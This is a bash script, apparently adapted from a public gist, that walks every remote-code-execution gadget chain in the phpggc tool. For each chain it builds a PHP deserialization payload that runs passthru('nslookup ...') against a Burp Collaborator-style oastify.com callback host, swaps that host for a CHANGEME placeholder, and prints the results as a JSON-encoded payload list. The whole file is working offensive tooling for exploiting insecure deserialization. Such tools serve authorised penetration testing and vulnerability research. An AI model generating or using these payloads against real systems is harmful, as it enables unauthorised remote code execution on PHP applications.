#!/bin/bash
# based on https://gist.github.com/honoki/029425e61e829a9344558c8587c29f0f#file-phpggc-generate-payloads-sh
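# Walks every phpggc gadget chain whose listing line mentions RCE, builds the
# chain with a fixed lookup command, and prints it as a JSON string (jq -aR)
# under a header naming the chain and the argument shape it expects.
# The callback host is replaced by a placeholder in the emitted text, so the
# generated list never carries the author's own out-of-band host name.
#
# Requires: phpggc checked out at ~/phpggc, jq, sed, xargs, /bin/grep.

phpggc="$HOME/phpggc/phpggc"
php_function="passthru"
callback_host="poi-slinger.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.oastify.com"
os_command="nslookup ${callback_host}"
placeholder="CHANGEME"
# Kept as an array so extra phpggc flags can be added without relying on
# unquoted word splitting.
options=(-s)

# Escape the dots so sed matches the literal host name, not "any character".
callback_re="${callback_host//./\\.}"

# Fail early with a clear message instead of a stream of "not found" errors
# from inside the pipeline.
for tool in "$phpggc" jq; do
  if ! command -v "$tool" >/dev/null 2>&1; then
    printf 'genpayloads: required tool not found: %s\n' "$tool" >&2
    exit 1
  fi
done

#######################################
# Print the header for one gadget chain, then the generated chain with the
# callback host replaced by the placeholder and encoded as a JSON string.
# Globals:   phpggc, options, callback_re, placeholder (read)
# Arguments: $1 - gadget chain name
#            $2 - argument shape shown in the header (may be empty)
#            $3… - arguments passed to phpggc after the chain name
# Outputs:   header and encoded chain on stdout
#######################################
emit_payload() {
  local gadget=$1 shape=$2
  shift 2
  printf '\n\n'
  printf '%s\n' "${gadget}${shape:+ ${shape}}"
  "$phpggc" "${options[@]}" "$gadget" "$@" |
    sed "s/${callback_re}/${placeholder}/g" |
    jq -aR .
}

"$phpggc" -l | /bin/grep RCE | cut -d' ' -f1 | xargs -L 1 "$phpggc" -i |
  /bin/grep --line-buffered 'phpggc ' |
  while read -r -a fields; do
    # read -r keeps backslashes intact; splitting into an array avoids the
    # glob expansion that an unquoted $line would be subject to.
    gadget=${fields[1]:-}
    # A usage line without a chain name gives nothing to build.
    [[ -n "$gadget" ]] || continue
    # Re-join with single spaces so the matches below are whitespace-tolerant.
    usage="${fields[*]}"
    case "$usage" in
      *"<function> <parameter>"*)
        emit_payload "$gadget" "<function> <parameter>" \
          "$php_function" "$os_command"
        ;;
      *"<code>"*)
        emit_payload "$gadget" "<code>" "${php_function}('${os_command}');"
        ;;
      *"<command>"*)
        emit_payload "$gadget" "<command>" "$os_command"
        ;;
      *)
        emit_payload "$gadget" ""
        ;;
    esac
  done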